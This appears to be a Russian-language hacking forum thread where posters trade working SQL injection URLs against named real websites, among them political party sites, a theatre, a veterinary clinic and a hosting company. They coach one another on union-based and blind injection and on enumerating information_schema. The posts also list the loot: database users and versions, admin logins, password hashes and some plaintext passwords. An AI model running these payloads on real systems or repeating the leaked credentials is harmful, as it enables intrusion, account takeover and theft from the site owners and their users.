Code: http://filtr-s.ru/?b=content&id=-1+union+select+concat(user(),0x3a,version(),0x3a,da tabase())-- user(): [email protected] version(): 5.0.67 database(): b23366 Code: http://www.teatrdoc.ru/plays.php?id=-30+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5-- user(): [email protected] version(): 4.1.22 database(): kinoteatr_td тИЦ: 500 PR: 5 Code: http://www.littlite.com/product.php?id=-30+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7-- user(): littlite@localhost version(): 5.0.32-Debian_7etch8-log database(): littlite тИЦ: 10 PR: 4
товарищи, поясните плз. как бороться с такими ситуациями: http://www.respect.at/index.php?lang=1+order+by+3-- все норм. а вот так http://www.respect.at/index.php?lang=-1+union+select+1,2,3-- The used SELECT statements have a different number of columns и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается. спасибо.
Челябинский сайт партии яблоко: Code: http://www.chel.yabloko.ru/persons/print.phtml?id=-1+union+select+1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- version():5.0.32-Debian_7etch8-log user():chel@localhost database():chel PR:6;тИЦ:2500; Офиц. сайт главы этой партии: Code: http://www.yavlinsky.ru/news/index.phtml?id=-3484+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- version(): 5.0.32-Debian_7etch8-log user(): gya@localhost database(): gya PR:6;тИЦ:750 (login:Администратор;password:adminforever),тока хз куда его вводить. Офиц. сайт партии родина: Code: http://www.rodina-nps.ru/library/print/?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),user(),database()),16,17-- version():4.1.22-standard-log user():rodinad_user@localhost database():rodinad_test PR:6;тИЦ:220;
у тебя данные отличаються, то есть сначало при 1+order+by+3-- а при -1+union+select+1,2,3-- то есть вот http://www.respect.at/index.php?lang=1+union+select+1,2,3-- Хуясе, 43 колонки PHP: http://www.lymphnotes.com/pro.php?id=77'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x2f,version(),user(),database()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/* 4.0.25/lncom@localhost/lncom www.watercampws.uiuc.edu - пр6 http://www.watercampws.uiuc.edu/index.php?menu_item_id=-1+union+select+concat_ws(0x2f,user,host,password,file_priv)+from+mysql.user+limit+4,1 kaap/%/7522af592a19ac45/Y kaap:BlankPwd
Code: http://www.respect.at/index.php?lang=1+and+lower(substring(version(),1,11))=char(52,46,48,46,50,55,105,110,111,100,101) version() - 4.0.27inode Code: http://www.respect.at/index.php?lang=1+and+lower(substring(user(),1,32))=char(114,101,48,48,48,51,51,48,64,117,98,104,48,49,45,111,117,116,50,46,117,98,104,46,105,110,111,100,101,46,97,116) user() - [email protected] _________________________________________________________________________ "Мезотерапия Украины" Code: http://www.mesoterapia.org.ua/?mid=-40+union+select+version(),2,3--
Code: http://www.corp-gov.ru/forum/index.php3?node_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11-- avi@localhost:avi_corp_gov:5.0.67-log PR:6 тИЦ: 500 Code: http://www.corp-gov.ru/forum/index.php3?node_id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,user_password),8,9,10,11+from+phpbb_users+limit+1,3-- froland:300c2f6225b9944ab0da38ecca94b4f7:mtmenj64 Форум phpbb тут http://www.corp-gov.ru/forums/ версия 2,0,23 шелл так и неполучилось залить=//
Code: http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7-- ezh@localhost:5.0.51a-log:aib PR:2 Тиц:20 Code: http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,concat(login,0x3a,password),3,4,5,6,7+from+users-- Code: http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7+from+phpbb_users-- ezh:$H$9apRNOB5h3fEpJ.QS1Ox8PyLnYp9j0 Code: http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--
Хостинг: Code: http://www.vianetworks.net/news.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12+from+users-- логин/пасс: Code: admin:a66cc0703df7a7af2f0624760d098206 ------------------------------------------------------------------ The End!
"Cайт Санкт-Петербургской международной конной выставки "Иппосфера." Code: http://www.horses.lenexpo.ru/news.phtml?id=-103+union+select+1,2,3,4,5,6,7,8,9-- 5-ая ветка. _______________________________________________ "СТРОИТЕЛЬНАЯ КОМПАНИЯ ГОРОД МАСТЕРОВ" Code: http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-5+union+select+1,version(),3-- 5-ая ветка. _______________________________________________ "Негосударственное образовательное учреждение дополнительного профессионального образования" Code: http://www.biosens.ru/index.php?res=folder&rec=-41+union+select+1,version()-- Снова 5-ая ветка. _____________________________________________ "Парк-отель" Code: http://www.parkhoteldubna.ru/index.php?id_page=1&id_article=3+and+substring(version(),1,1)=5-- Аналогично.
Code: http://english.dvb.no/news.php?id=99997010+union+select+1,version(),3,database(),5,6,USER(),8,9,10,LAST_INSERT_ID(),12,13,14,15,16,17,18,19,20,21-- 5.0.67-0ubuntu6 Code: http://www.teatrdoc.ru/plays.php?id=-3+union+select+1,version(),database()%20,USER(),5-- Code: http://www.mibf.ru/index.php?id=37+union+select+1,2,3,4,5,6,7,8,9,10--
Ветеринарная помощь Code: http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8-- user(): zorkov@localhost version(): 5.0.27 database(): zorkov тИЦ: 10 PR: 2 версия 5+, присутсвует - information_schema находим таблицу с юзерами Code: http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit+48,1 marroz_users получаем колонки Code: http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x6d6172726f7a5f7573657273+limit+1,3 осталось только извлечь логин и пароль =) Code: http://vet4pet.ru/stat/fulltext.php?id=-7+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+users+limit+1,1-- ussr:54621b46c1664db5ba7127d8f22aff00 (456654) Polska Federacja Biotechnologii Code: http://www.pfb.p.lodz.pl/main/main.php?id=-7+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15,16,17,18-- user(): [email protected] version(): 5.0.45-Debian_1ubuntu3.3-log database(): p_pfb тИЦ: 10 PR: 4 присутствует таблица pbfuser колонки login,haslo,osoba,tresc,datadodania,r01,r02 Code: http://www.pfb.p.lodz.pl/main/main.php?id=-7+union+select+1,2,3,4,5,6,7,8,concat(login,0x3a,haslo,0x3a,osoba,0x3a,tresc,0x3a,datadodania),10,11,12,13,14,15,16,17,18+from+pbfuser+limit+1,1/* pfb:krakowolska Federacja Biotechnologii::2004-09-13 11:08:11
Code: http://www.biolight.ru/news.php?id=-1' Code: http://www.biolight.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5-- 5.0.51a-community-log alien_biolight alien_biolight@localhost Админ: Code: http://www.biolight.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,Login,cust_password),3,4,5/**/from/**/alien_biobitor.ukn_users-- MANAGER:12345 Админка: http://www.biolight.ru/admin/
Code: http://gta.com.ua/file_sa_details.phtml?id=59+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,version(),database(),USER(),SESSION_USER(),LAST_INSERT_ID(),13,14,15,16,17,18,19,20-- дальше влом крутить.. 5.0.51a-community:gtacom_gta:gtacom_gta@localhost Code: www.pogoda.ua/index.php?id=28+union+select+1,2,3,4,5/* а тут вывода ненашол(
